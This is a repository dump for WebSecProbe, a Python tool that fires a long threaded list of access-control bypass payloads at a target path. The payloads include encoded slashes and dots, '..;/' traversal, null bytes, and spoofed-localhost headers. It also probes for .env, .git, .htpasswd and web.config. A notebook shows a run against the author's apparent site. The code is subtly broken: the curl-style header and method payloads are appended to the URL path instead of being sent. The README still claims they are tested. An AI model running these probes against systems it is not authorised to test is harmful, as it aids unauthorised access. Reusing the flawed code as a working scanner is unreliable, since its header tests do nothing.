Repository: spyboy-productions/WebSecProbe Branch: main Commit: d8f9f6a60e73 Files: 11 Total size: 61.1 KB Directory structure: gitextract_h9c1te1p/ ├── .github/ │ ├── FUNDING.yml │ └── workflows/ │ └── python-publish.yml ├── .gitignore ├── LICENSE ├── README.md ├── WebSecProbe/ │ ├── .gitignore │ ├── __init__.py │ └── main.py ├── WebSecProbe.ipynb ├── requirements.txt └── setup.py ================================================ FILE CONTENTS ================================================ ================================================ FILE: .github/FUNDING.yml ================================================ # These are supported funding model platforms custom: ['https://www.paypal.com/paypalme/iamshubhamkumar'] ================================================ FILE: .github/workflows/python-publish.yml ================================================ # This workflow will upload a Python Package using Twine when a release is created # For more information see: https://docs.github.com/en/actions/automating-builds-and-tests/building-and-testing-python#publishing-to-package-registries # This workflow uses actions that are not certified by GitHub. # They are provided by a third-party and are governed by # separate terms of service, privacy policy, and support # documentation. name: Upload Python Package on: release: types: [published] permissions: contents: read jobs: deploy: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - name: Set up Python uses: actions/setup-python@v3 with: python-version: '3.x' - name: Install dependencies run: | python -m pip install --upgrade pip pip install build - name: Build package run: python -m build - name: Publish package uses: pypa/gh-action-pypi-publish@27b31702a0e7fc50959f5ad993c78deac1bdfc29 with: user: __token__ password: ${{ secrets.SECRETSPYPI }} ================================================ FILE: .gitignore ================================================ # Ignore Mac DS_Store files *.DS_Store ================================================ FILE: LICENSE ================================================ MIT License Copyright (c) 2023 Spyboy Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ================================================ FILE: README.md ================================================

WebSecProbe is a security testing utility designed for web security researchers, penetration testers, and system administrators to **analyze HTTP 403 (Forbidden) responses and access control behavior** in web applications. The tool assists in identifying **misconfigurations, inconsistent authorization checks, and unintended access paths** by systematically testing request variations, headers, and endpoints. These techniques help reveal weaknesses that could otherwise remain unnoticed during manual testing. WebSecProbe is intended for **authorized security assessments and defensive research**, enabling teams to validate access control implementations and strengthen the overall security posture of their web applications. > [!IMPORTANT] > This tool must be used only on applications you own or have explicit permission to test. ### Run Online Free On Google Colab [![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com//github/spyboy-productions/WebSecProbe/blob/main/WebSecProbe.ipynb)

This tool is a Proof of Concept and is for Educational Purposes Only.

--- WebSecProbe is designed to perform a series of HTTP requests to a target URL with various payloads in order to test for potential security vulnerabilities or misconfigurations. Here's a brief overview of what the code does: - It takes user input for the target URL and the path. - It defines a list of payloads that represent different HTTP request variations, such as URL-encoded characters, special headers, and different HTTP methods. - It iterates through each payload and constructs a full URL by appending the payload to the target URL. - For each constructed URL, it sends an HTTP GET request using the requests library, and it captures the response status code and content length. - It prints the constructed URL, status code, and content length for each request, effectively showing the results of each variation's response from the target server. - After testing all payloads, it queries the Wayback Machine (a web archive) to check if there are any archived snapshots of the target URL/path. If available, it prints the closest archived snapshot's information. > Does This Tool Bypass 403 ? > The code's purpose is more about testing the behaviour of the server when different requests are made, including requests with various payloads, headers, and URL variations. While some of the payloads and headers in the code might be used in certain scenarios to test for potential security misconfigurations or weaknesses, it doesn't guarantee that it will bypass a 403 Forbidden status code. > In summary, this code is a tool for exploring and analyzing a web server's responses to different requests, but whether or not it can bypass a 403 Forbidden status code depends on the specific configuration and security measures implemented by the target server.

Click to expand: Payload Breakdown

Here's a brief breakdown of the payloads: - **Empty String:** - An empty string as a payload. - **URL Encoding (%2e):** - URL encoding of a dot (.) concatenated with the path. - **Path with Slash (/):** - Path followed by a slash (/). - **Double Slash (//):** - Double slash before and after the path. - **Path with Current Directory (./):** - Current directory (./) before and after the path. - **Request Header (-H X-Original-URL):** - X-Original-URL header with the path. - **Request Header (-H X-Custom-IP-Authorization):** - X-Custom-IP-Authorization header with the IP address 127.0.0.1. - **Request Header (-H X-Forwarded-For):** - X-Forwarded-For header with the IP address http://127.0.0.1 and 127.0.0.1:80. - **Request Header (-H X-rewrite-url):** - X-rewrite-url header with the path. - **URL Encoding (%20 and %09):** - URL encoding with space (%20) and tab (%09). - **Query Parameter (?):** - Query parameter with a question mark (?). - **Path with HTML Extension (.html):** - Path with .html extension. - **Path with Query String (/?anything):** - Path followed by a query string. - **Fragment Identifier (#):** - Fragment identifier with a hash (#). - **POST Request Header (-H Content-Length:0 -X POST):** - Content-Length header set to 0 and a POST request. - **Wildcard (*):** - Wildcard after the path. - **Path with PHP Extension (.php):** - Path with .php extension. - **Path with JSON Extension (.json):** - Path with .json extension. - **HTTP Method (-X TRACE):** - TRACE HTTP method. - **Request Header (-H X-Host):** - X-Host header with the IP address 127.0.0.1. - **Path Traversal (..;/):** - Path traversal. - **Whitespace at the Beginning (" " + self.path):** - Whitespace added at the beginning of the path. - **Path with Semicolon (;):** - Semicolon added before and after the path. - **Path with Extra Slashes:** - Test for bypassing by adding extra slashes (e.g., //path). - **Path with URL-encoded Slash:** - Use URL-encoded slash to bypass (e.g., %2Fpath). - **Path with Double URL-encoded Slash:** - Use double URL-encoded slash (e.g., %252Fpath). - **Path with Path Parameter:** - Add a path parameter (e.g., /path;parameter). - **Path with Query Parameter in Path:** - Add a query parameter within the path (e.g., /path?parameter). - **Path with Additional Dots:** - Add additional dots in the path (e.g., /path/../path). - **Path with Unicode Encoding:** - Use Unicode encoding to represent characters (e.g., %u002Fpath). - **Path with Double URL-encoded Dot:** - Use double URL-encoded dot (e.g., %252E). - **Path with URL-encoded Null Byte:** - Use URL-encoded null byte (e.g., %00). - **Path with Hex Encoding:** - Use hex encoding for characters in the path (e.g., /path%2Ehtml). This list covers a variety of common techniques used in web security testing. However, the effectiveness of these payloads depends on the specific vulnerabilities or misconfigurations present in the target system.

---

OS compatibility :

Requirements:

### ⭔ PYPI Installation : https://pypi.org/project/WebSecProbe/ --- ``` pip install WebSecProbe ``` #### How To Run On CLI: `WebSecProbe ` Example: ``` WebSecProbe https://example.com admin-login ``` #### Python Code ```py from WebSecProbe.main import WebSecProbe if __name__ == "__main__": url = 'https://example.com' # Replace with your target URL path = 'admin-login' # Replace with your desired path probe = WebSecProbe(url, path) probe.run() ``` --- ## Contribution: Contributions and feature requests are welcome! If you encounter any issues or have ideas for improvement, feel free to open an issue or submit a pull request. #### 😴🥱😪💤 ToDo: - Bypass 401 & header #### 💬 If having an issue [Chat here](https://discord.gg/ZChEmMwE8d) [![Discord Server](https://discord.com/api/guilds/726495265330298973/embed.png)](https://discord.gg/ZChEmMwE8d) ### ⭔ Snapshots: ---

If you find this GitHub repo useful, please consider giving it a star! ⭐️

================================================ FILE: WebSecProbe/.gitignore ================================================ # Ignore Mac DS_Store files *.DS_Store ================================================ FILE: WebSecProbe/__init__.py ================================================ ================================================ FILE: WebSecProbe/main.py ================================================ import argparse import requests import json import re import threading from requests.packages.urllib3.exceptions import InsecureRequestWarning from tabulate import tabulate class WebSecProbe: def __init__(self, url, path): self.url = url self.path = path self.results = [] self.threads = [] def is_valid_url(self): # Check if the URL starts with http:// or https:// and doesn't end with / return re.match(r'^https?://[^/]+$', self.url) def format_path(self): # Replace spaces with hyphens self.path = self.path.replace(' ', '-') def send_request(self, payload): full_url = f"{self.url}/{payload}" response = requests.get(full_url) # Remove verify=False to enable SSL certificate verification status_code = response.status_code colored_code = self.color_status_code(status_code) # Added this line to colorize status codes content_length = len(response.content) self.results.append([full_url, colored_code, content_length]) def color_status_code(self, code): if code >= 200 and code < 300: return f'\033[32m{code}\033[0m' # Green elif code >= 300 and code < 400: return f'\033[33m{code}\033[0m' # Yellow elif code >= 400 and code < 500: return f'\033[31m{code}\033[0m' # Red else: return f'\033[35m{code}\033[0m' # Magenta def run(self): # Validate the URL if not self.is_valid_url(): print("Invalid URL. It should start with http:// or https:// and should not end with /") exit(1) # Format the path by replacing spaces with hyphens self.format_path() # List of payloads payloads = [ "", f"{self.path}%2e", f"{self.path}/.", f"{self.path}//", f"{self.path}/./", f"-H X-Original-URL: {self.path}", f"-H X-Custom-IP-Authorization: {self.path} 127.0.0.1", f"-H X-Forwarded-For: http://{self.path}127.0.0.1", f"-H X-Forwarded-For: {self.path}127.0.0.1:80", f"-H X-rewrite-url: {self.path}", f"{self.path}%20", f"{self.path}%09", f"{self.path}?{self.path}", f"{self.path}.html", f"{self.path}/?anything", f"{self.path}#{self.path}", f"-H Content-Length:0 -X POST", f"{self.path}/*", f"{self.path}.php", f"{self.path}.json", f"-X TRACE {self.path}", f"-H X-Host: {self.path}127.0.0.1", f"{self.path}..;/", f" {self.path};/", f"{self.path}/path", f"{self.path}%2Fpath", f"{self.path}%252Fpath", f"{self.path}/path;parameter", f"{self.path}/path?parameter", f"{self.path}/path/../path", f"{self.path}%u002Fpath", f"{self.path}%252E", f"{self.path}%00{self.path}", f"{self.path}/path%2Ehtml", # New payloads f"{self.path}/?", f"{self.path}//", f"{self.path}??", f"{self.path}??/", f"{self.path}..;", f"{self.path}%23", f"{self.path}%26", f"{self.path}/~", f"{self.path}/%7E", f"{self.path}/%C0%AF", f"{self.path}/%C0%AE", f"{self.path}/%252E%252E/", f"{self.path}/%252F", f"{self.path}/%255C", f"{self.path}%3f", f"{self.path}%3F", f"{self.path}/%252e/", f"{self.path}/%252e%252e/", f"{self.path}/%252f", f"{self.path}/%2e/", f"{self.path}/%2e%2e/", f"{self.path}/%2f", f"{self.path}/%09", f"{self.path}/%09/", f"{self.path}/%0A", f"{self.path}/%0A/", f"{self.path}/%0D", f"{self.path}/%0D/", f"{self.path}/%0C", f"{self.path}/%0C/", f"{self.path}/.json", f"{self.path}/.json/", f"{self.path}/.xml", f"{self.path}/.xml/", f"{self.path}/.html", f"{self.path}/.html/", f"{self.path}/.php", f"{self.path}/.php/", f"{self.path}/.asp", f"{self.path}/.asp/", f"{self.path}/.aspx", f"{self.path}/.aspx/", f"{self.path}/.cgi", f"{self.path}/.cgi/", f"{self.path}/.jsp", f"{self.path}/.jsp/", f"{self.path}/.exe", f"{self.path}/.exe/", f"{self.path}/.dll", f"{self.path}/.dll/", f"{self.path}/.bat", f"{self.path}/.bat/", f"{self.path}/.bin", f"{self.path}/.bin/", f"{self.path}/.phtml", f"{self.path}/.phtml/", f"{self.path}/.htaccess", f"{self.path}/.htaccess/", f"{self.path}/.htpasswd", f"{self.path}/.htpasswd/", f"{self.path}/web.config", f"{self.path}/web.config/", f"{self.path}/robots.txt", f"{self.path}/robots.txt/", f"{self.path}/admin", f"{self.path}/admin/", f"{self.path}/administrator", f"{self.path}/administrator/", f"{self.path}/login", f"{self.path}/login/", f"{self.path}/wp-admin", f"{self.path}/wp-admin/", f"{self.path}/wp-login", f"{self.path}/wp-login/", f"{self.path}/config", f"{self.path}/config/", f"{self.path}/.git", f"{self.path}/.git/", f"{self.path}/.svn", f"{self.path}/.svn/", f"{self.path}/.hg", f"{self.path}/.hg/", f"{self.path}/.bzr", f"{self.path}/.bzr/", f"{self.path}/test", f"{self.path}/test/", f"{self.path}/demo", f"{self.path}/demo/", f"{self.path}/backup", f"{self.path}/backup/", f"{self.path}/tmp", f"{self.path}/tmp/", f"{self.path}/temp", f"{self.path}/temp/", f"{self.path}/.env", f"{self.path}/.env/", f"{self.path}/.DS_Store", f"{self.path}/.DS_Store/", ] for payload in payloads: thread = threading.Thread(target=self.send_request, args=(payload,)) self.threads.append(thread) thread.start() # Wait for all threads to complete for thread in self.threads: thread.join() # Print the results in a table table_headers = ["URL", "Status Code", "Content Length"] print(tabulate(self.results, headers=table_headers, tablefmt="grid")) # Wayback machine code print("Wayback machine:") # Create Wayback Machine API URL wayback_url = f"https://web.archive.org/cdx/search/cdx?url={self.url}/{self.path}&output=json" # Fetch snapshots using the Wayback Machine API response = requests.get(wayback_url) snapshots = json.loads(response.text) if snapshots: print("Available snapshots:") for snapshot in snapshots: timestamp = snapshot[1] original_url = snapshot[2] wayback_url = f"https://web.archive.org/web/{timestamp}/{original_url}" print(f"Timestamp: {timestamp}") print(f"Original URL: {original_url}") print(f"Wayback URL: {wayback_url}") print() else: print("No available snapshots found in Wayback Machine.") def main(): # Your banner and social links twitter_url = 'https://spyboy.in/twitter' discord = 'https://spyboy.in/Discord' website = 'https://spyboy.in/' blog = 'https://spyboy.blog/' github = 'https://github.com/spyboy-productions/WebSecProbe' VERSION = '0.0.12' R = '\033[31m' # red G = '\033[32m' # green C = '\033[36m' # cyan W = '\033[0m' # white Y = '\033[33m' # yellow banner = r''' _ _ _ _ _____ _____ _ | | | |___| |_| __|___ ___| _ |___ ___| |_ ___ | | | | -_| . |__ | -_| _| __| _| . | . | -_| |_____|___|___|_____|___|___|__| |_| |___|___|___| Web Security Assessment Tool ''' print(f'{C}{banner}{W}') print(f'{G}[~] {Y}Version : {W}{VERSION}') print(f'{G}[~] {Y}Created By : {W}Spyboy') print(f'{G} ╰➤ {Y}Twitter : {W}{twitter_url}') print(f'{G} ╰➤ {Y}Discord : {W}{discord}') print(f'{G} ╰➤ {Y}Website : {W}{website}') print(f'{G} ╰➤ {Y}Blog : {W}{blog}') print(f'{G} ╰➤ {Y}Github : {W}{github}') print('\n') # Create an argument parser parser = argparse.ArgumentParser(description='Web Security Assessment Tool') parser.add_argument('url', type=str, help='Target URL (e.g., https://example.com)') parser.add_argument('path', type=str, help='Path to assess (e.g., /path/to/assess)') # Parse command-line arguments args = parser.parse_args() url = args.url path = args.path # Create an instance of WebSecProbe and run it probe = WebSecProbe(url, path) probe.run() if __name__ == "__main__": main() ================================================ FILE: WebSecProbe.ipynb ================================================ { "nbformat": 4, "nbformat_minor": 0, "metadata": { "colab": { "provenance": [] }, "kernelspec": { "name": "python3", "display_name": "Python 3" }, "language_info": { "name": "python" } }, "cells": [ { "cell_type": "code", "execution_count": 1, "metadata": { "colab": { "base_uri": "https://localhost:8080/" }, "id": "x9dwYzaIe06t", "outputId": "a8789693-6e05-441e-f923-5aaec511530d" }, "outputs": [ { "output_type": "stream", "name": "stdout", "text": [ "Collecting WebSecProbe\n", " Downloading WebSecProbe-0.0.12-py3-none-any.whl (8.1 kB)\n", "Requirement already satisfied: requests in /usr/local/lib/python3.10/dist-packages (from WebSecProbe) (2.31.0)\n", "Requirement already satisfied: tabulate in /usr/local/lib/python3.10/dist-packages (from WebSecProbe) (0.9.0)\n", "Requirement already satisfied: charset-normalizer<4,>=2 in /usr/local/lib/python3.10/dist-packages (from requests->WebSecProbe) (3.3.2)\n", "Requirement already satisfied: idna<4,>=2.5 in /usr/local/lib/python3.10/dist-packages (from requests->WebSecProbe) (3.6)\n", "Requirement already satisfied: urllib3<3,>=1.21.1 in /usr/local/lib/python3.10/dist-packages (from requests->WebSecProbe) (2.0.7)\n", "Requirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.10/dist-packages (from requests->WebSecProbe) (2024.2.2)\n", "Installing collected packages: WebSecProbe\n", "Successfully installed WebSecProbe-0.0.12\n" ] } ], "source": [ "!pip install WebSecProbe" ] }, { "cell_type": "code", "source": [ "!WebSecProbe https://spyboy.in premium" ], "metadata": { "colab": { "base_uri": "https://localhost:8080/" }, "id": "Twlxnnf5e68P", "outputId": "57c08e13-0693-4edf-b09a-675766b8b737" }, "execution_count": 2, "outputs": [ { "output_type": "stream", "name": "stdout", "text": [ "\u001b[36m \n", " _ _ _ _ _____ _____ _ \n", " | | | |___| |_| __|___ ___| _ |___ ___| |_ ___ \n", " | | | | -_| . |__ | -_| _| __| _| . | . | -_|\n", " |_____|___|___|_____|___|___|__| |_| |___|___|___|\n", " Web Security Assessment Tool \n", " \u001b[0m\n", "\u001b[32m[~] \u001b[33mVersion : \u001b[0m0.0.12\n", "\u001b[32m[~] \u001b[33mCreated By : \u001b[0mSpyboy\n", "\u001b[32m ╰➤ \u001b[33mTwitter : \u001b[0mhttps://spyboy.in/twitter\n", "\u001b[32m ╰➤ \u001b[33mDiscord : \u001b[0mhttps://spyboy.in/Discord\n", "\u001b[32m ╰➤ \u001b[33mWebsite : \u001b[0mhttps://spyboy.in/\n", "\u001b[32m ╰➤ \u001b[33mBlog : \u001b[0mhttps://spyboy.blog/\n", "\u001b[32m ╰➤ \u001b[33mGithub : \u001b[0mhttps://github.com/spyboy-productions/WebSecProbe\n", "\n", "\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| URL | Status Code | Content Length |\n", "+===================================================================+===============+==================+\n", "| https://spyboy.in/-H X-Original-URL: premium | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/-H X-Host: premium127.0.0.1 | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium..;/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium%2e | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium#premium | \u001b[32m200\u001b[0m | 14772 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium%252Fpath | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium%2Fpath | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/path | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/path?parameter | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/ premium;/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium%252E | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/? | \u001b[32m200\u001b[0m | 14772 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/path%2Ehtml | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/path;parameter | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium%00premium | \u001b[31m400\u001b[0m | 9121 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/path/../path | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/./ | \u001b[32m200\u001b[0m | 14772 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/. | \u001b[32m200\u001b[0m | 14772 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/?anything | \u001b[32m200\u001b[0m | 14772 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/-H Content-Length:0 -X POST | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/-H X-Custom-IP-Authorization: premium 127.0.0.1 | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/-H X-rewrite-url: premium | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/-H X-Forwarded-For: http://premium127.0.0.1 | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/ | \u001b[32m200\u001b[0m | 17049 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium.json | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium.html | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/* | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium%20 | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium%09 | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/-X TRACE premium | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium// | \u001b[32m200\u001b[0m | 14772 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/-H X-Forwarded-For: premium127.0.0.1:80 | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium?premium | \u001b[32m200\u001b[0m | 14772 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium.php | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium%u002Fpath | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium// | \u001b[32m200\u001b[0m | 14772 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium??/ | \u001b[32m200\u001b[0m | 14772 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/~ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/%C0%AE | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium?? | \u001b[32m200\u001b[0m | 14772 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium%26 | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/%7E | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium%23 | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium..; | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/%C0%AF | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/%252E%252E/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/%252F | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium%3f | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/%255C | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium%3F | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/%2e/ | \u001b[32m200\u001b[0m | 14772 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/%252e%252e/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/%252e/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/%2e%2e/ | \u001b[32m200\u001b[0m | 17049 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/%252f | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/%2f | \u001b[32m200\u001b[0m | 14772 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/%09 | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/%09/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/%0D | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/%0A/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/%0A | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/%0C/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/%0C | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/%0D/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.xml | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.json/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.json | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.html/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.php/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.php | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.html | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.aspx/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.asp | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.xml/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.asp/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.aspx | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.cgi | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.cgi/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.exe/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.jsp/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.jsp | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.dll | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.exe | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.bat | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.dll/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.bat/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.bin | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.phtml/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.bin/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.htaccess/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.phtml | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/robots.txt | \u001b[31m404\u001b[0m | 1226 |\n", 